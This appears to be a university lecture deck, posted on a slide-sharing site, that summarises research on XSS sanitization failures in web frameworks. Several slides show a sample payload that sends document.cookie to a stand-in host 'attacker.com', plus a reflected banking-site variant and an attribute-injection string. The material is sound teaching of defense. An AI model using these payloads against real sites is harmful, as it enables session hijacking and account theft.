38
THE BROKEN WEB A Systematic Analysis of XSS Sanitization in Web Application Frameworks

THE BROKEN WEB

  • Upload
    lonna

  • View
    47

  • Download
    0

Embed Size (px)

DESCRIPTION

THE BROKEN WEB. A Systematic Analysis of XSS Sanitization in Web Application Frameworks . Executive summary. Web page processing analyzed in detail Sanitization is quite complex Context sensitive 14 WEB frameworks analyzed None handle sanitization properly - PowerPoint PPT Presentation

Citation preview

Page 1: THE BROKEN WEB

THE BROKEN WEBA Systematic Analysis of XSS Sanitization in

Web Application Frameworks

Page 2: THE BROKEN WEB

Executive summary• Web page processing analyzed in detail• Sanitization is quite complex

• Context sensitive• 14 WEB frameworks analyzed

• None handle sanitization properly• In some cases they give a false sense of security because the

algorithm is wrong

Page 3: THE BROKEN WEB

HTTP background

GET www.example.com/sample.html

• Client sends request to server

www.example.com:/sample.html

<h>Sample file</h><p>This is a sample</p>

• Server locates and sends back file

Sample file

This is a sample

• Client displays file

Basic HTTP operation

Page 4: THE BROKEN WEB

HTTP background

GET www.example.com/sample.php

• Client sends request

Sample.php:

<?phpecho ‘<h>Sample file</h>’;echo ‘<p>This is a sample</p>’;?>

• Server executes script

<h>Sample file</h>

<p>This is a sample</p>

• Server returns generated file

Sample file

This is a sample

• Client displays file

Server side scripting

Page 5: THE BROKEN WEB

HTTP background

POST www.example.com/sample.php?name=Mr. Dummy&soc=234-23-5555&credit=1234-1234-1234-1234

• Client sends data to server

Sample.php:

<?php# save data somewhere….echo ‘<p>Now I own you.</p>’?>

• Server executes script

Please send me your important financial information:

Name: Mr. Dummy__Soc: 234-23-5555Credit card number:1234-1234-1234-1234

SUBMIT

• User fills in fields and presses ‘Submit’

Form management

Now I own you.

• Server sends response page to client

Page 6: THE BROKEN WEB

HTTP backgroundClient side scripting

<html><body>

<h1>My First Web Page</h1>

<script type="text/javascript">document.write("<p>" + Date() + "</p>");</script>

</body></html>

Page 7: THE BROKEN WEB

HTTP backgroundClient side scripting

<html><body>

<h1>My First Web Page</h1>

<p>Tue Feb 28 2012 14:28:07 GMT-0500 (EST)</p>

</body></html>

Page 8: THE BROKEN WEB

HTTP backgroundClient side scripting

My First Web Page

Tue Feb 28 2012 14:28:07 GMT-0500 (EST)

Page 9: THE BROKEN WEB

XSS attackServer side code prints text entered by a user from an earlier session. Consider this code:

<?phpecho ‘<p>Note from ‘.$user.’</p>’echo ‘<p>’.$note.’</p>’?>

Suppose $note contains

<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>The sky is falling.

Page 10: THE BROKEN WEB

XSS attackThe result is that the following is sent to your browser:

<p>Note from Mr. Apocalypse</p><p><script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>The sky is falling.</p>

Page 11: THE BROKEN WEB

XSS attackYour browser displays the following:

Note from Mr. Apocalypse

[img] The sky is falling.

And the attacker has gotten your cookie.

Page 12: THE BROKEN WEB

XSS attackThe attacker simply needed to enter this script on the screen used to post the note.

Logged in as: Mr. Apocalypse

Text of message to post:<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>The sky is falling._______

Any website that echoes back a user input can be used foran XSS attack.

Page 13: THE BROKEN WEB

XSS attack• The following can be used to obtain the cookie for your

bank account:

<script>document.location='http://banking.com/search?name=<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>'</script>

Page 14: THE BROKEN WEB

SanitizationOne solution is to escape out sensitive characters

<script>document.write("<img src=http://attacker.com/" + document.cookie + ">")</script>

becomes

&lt;script&gt;document.write(“&lt;img src=http://attacker.com/" + document.cookie + “&gt;”)&lt;/script&gt;Problem: sanitization needs to be done in a contextsensitive manner and the rules are very complex

Page 15: THE BROKEN WEB

Web page parsing

Page 16: THE BROKEN WEB

Challenge 1: context sensitivityConsider this code:

echo ‘<p>’.$note.’</p>’

Here one can replace ‘<‘ with &lt; and ‘> with &gt; to block attacks. However consider:

echo ‘<img src=‘.$url.’>’

Consider the following url:

picture.jpg’ onLoad=‘document.location=…”

Page 17: THE BROKEN WEB

Challenge 2: Sanitizing nested contexts

Consider this piece of php code:

echo ‘<script> var x = ‘.$UNTRUSTED_DATA.’...</script>’

One needs to block both the possibility of a </script> and that of a ‘ to prevent attacks

Page 18: THE BROKEN WEB

Challenge 3: Browser transductionsConsider:

<div class=‘comment-box’onclick=‘displayComment(" UNTRUSTED",this)’> ... hidden comment ... </div>

Even if all the “ characters are replaced with &quot, HTML 5 removes the encoding before passing the text to Javascript.

Page 19: THE BROKEN WEB

Challenge 4: Dynamic codeConsider this program:

function foo(untrusted) { document.write("<input onclick=’foo(" + untrusted + ")’ >");}

Evaluation generates html code that will repeat the call to the function.

Page 20: THE BROKEN WEB

Challenge 5: Character set issues+ADw- maps to < in UTF-7

The sanitizer needs to recognize the character set conversion

Page 21: THE BROKEN WEB

Challenge 6: everything else• MIME based XSS• Browser bugs

• Capability leaks• Parsing inconsistencies

• Browser extensions• Adobe flash is fairly buggy

Page 22: THE BROKEN WEB

Evaluation of web frameworks and applications

• Subjects• 14 popular web application frameworks• 8 popular php applications

• Evaluation• Auto-sanitization and/or sanitization libraries• Dynamic sanitization handling

Page 23: THE BROKEN WEB

Auto sanitization• 7 of 14 support auto sanitization

• 4 of 7 of these perform context insensitive sanitization which is inherently unsafe

• 14.8%-33.6% of output sinks fail to be protected by auto sanitization in 10 popular Django application

Page 24: THE BROKEN WEB

Context sensitive sanitization• Performed by 3 of 7 frameworks

• GWT, Google Clearsilver, and Google Ctemplate • Involved a runtime parser that checked the context and

applied the appropriate sanitization function• User needs to mark untrusted variables• No detailed analysis of reliability

• I assume they worked reasonably well

Page 25: THE BROKEN WEB

Manual sanitization• Prone to error

• Variables missed• Wrong sanitization function used

Page 26: THE BROKEN WEB

Dynamic code evaluation• Perform appropriate runtime checks before printing

untrusted strings• Generally not supported by frameworks• Four frameworks provided static sanitization of untrusted

strings within the context of Javascript constants

Page 27: THE BROKEN WEB

DOM based errors• Javascript can actually reference the content of a web

page

<h1>This page changes itself</h1><a name=“xxx”>Original content</a><script>document.anchors[0].innerHTML=“New content”;</script>

Page 28: THE BROKEN WEB

DOM based errors• Javascript can actually reference the content of a web

page

<h1>This page changes itself</h1><a name=“xxx”>New content</a><script>document.anchors[0].innerHTML=“New content”;</script>

Page 29: THE BROKEN WEB

DOM based errors• Consider this code:

text = element.getAttribute(’title’);// ... elided ...desc = create_element(’span’, ’bottom’);desc.innerHTML = text;tooltip.appendChild(desc);

This code read an element from the HTML, destroy escaping and reinsert it elsewhere

To avoid bug:use of innerText to write or innerHTML to read

Page 30: THE BROKEN WEB

DOM based errors• Ignored by frameworks• Cause many XSS vulnerabilities

Page 31: THE BROKEN WEB

Expressiveness of contexts in web applications

• 8 php applications analyzed• 19-532KLOC

• All applications emit untrusted data into all contexts• Applications sometimes employ different sanitizers for the

same context• General conclusion: frameworks do not provide sufficient

sanitization support

Page 32: THE BROKEN WEB

Manual sanitization expressiveness• 9 of 14 frameworks do not support contexts other than the

generic HTML• 4 provided sanitizers for Javascript string context• 1 framework provided a sanitizer for Javascript number

and boolean contexts• None allow for sanitization of Javascript code• Only one framework allowed customization of the sanitizer

within a context—the others had a pre-packaged sanitizer for all contexts

Page 33: THE BROKEN WEB

Correctness of sanitizers• Sanitizers prone to error• In frameworks they usually work on a “whitelist” model in

which only structures following specific patterns are allowed

• One framework uses a “blacklist” model in which specific strings are forbidden

• Frameworks rely on canonical form into which all output is formatted to simplify sanitizers

• The authors conclude that the “whitelist” approach should be researched. The “blacklist” approach is too error prone.

Page 34: THE BROKEN WEB

Related work• XSS analysis and defense

• Server side code errors• Javascript code errors• Research identifies vulnerabilities

• Untrusted data showing up in output• Improper sanitization

• Server side solutions• BLUEPRINT, SCRIPTGARD, XSS-GUARD• Formalize web model to design sanitizers

• Client side• XSS-Auditor

• Analyze browser reference patterns to try and identify attacks• Does not separate trusted and untrusted data

• Studies in sanitizer correctness• Manual process of adding sanitization is error prone• None provide a good underlying model for sanitizers

• Taint tracking and security typed languages

Page 35: THE BROKEN WEB

Paper’s conclusions• Current frameworks do not properly manage sanitization• The paper suggests a future direction of producing a

formal model of the browser’s behavior

Page 36: THE BROKEN WEB

Some later work• Saxena developed php analysis tools• Model checker – symbolic execution of php to try and find

dangerous code• Static analysis—tries to identify and incorporate sanitizers

based on the context of a print• Probably the better approach• Needs to be integrated with some sort of dynamic analysis

Page 37: THE BROKEN WEB

Discussion questions• What is the best approach for solving XSS?

• In addition to technical issues, what practical issues need to be addressed to get a solution deployed? For example, asking everyone to rewrite their php code is going to be difficult.

• Should the government get involved in regulating web sites to make sure basic protection standards are upheld?

Page 38: THE BROKEN WEB

XSS attack game• 2 teams• Source code available from www.cs.jhu.edu/~roe• Look for $_GET and $_POST variables for user input• Use MAMP to run